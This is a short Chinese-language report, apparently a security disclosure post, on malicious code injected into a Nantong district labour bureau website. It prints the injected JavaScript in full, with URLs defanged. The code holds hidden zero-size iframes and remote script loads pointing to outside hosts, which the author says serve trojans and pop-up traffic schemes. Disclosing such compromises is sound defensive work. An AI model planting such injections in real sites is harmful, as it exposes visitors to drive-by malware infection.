南通市 崇川区 人事劳动和社会保障局网 被恶意注入代码
hxxp://www.jschongchuan.lss.gov.cn
在脚本hxxp://www.jschongchuan.lss.gov.cn/FS_Inc/Prototype.js
底部被注入代码如下:
document.write("<script src=\"hxxp://www.iis51.com/cms_app/ad_4.js\"><\/script>");
内容为:
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie1=risb;expires="+ Then.toGMTString()
document.write("<div style=\"display:none\">");
document.writeln("<iframe src=\"hxxp://www.hryspao.cn/one/a11.htm\"width=50 height=0></iframe>");
document.write ('<script language="javascript" type="text/javascript" src="hxxp://js.users.51.la/2056079.js"></script>');
}
}Get();
另一脚本hxxp://www.jschongchuan.lss.gov.cn/Ads/2.js
底部被注入代码如下:
document.write('<iframe height=0 width=0 src="hxxp://cncncncncncncncncncncncncncncn.cn/ie.htm?id=999"></iframe>');
第一个被挂的是当前正在流行的木马群,第二个是SEX网弹窗刷流量。南通市 崇川区 人事劳动和社会保障局网,这样一个公开与民众紧密相关的政务网站,它的安全性确实值得关注!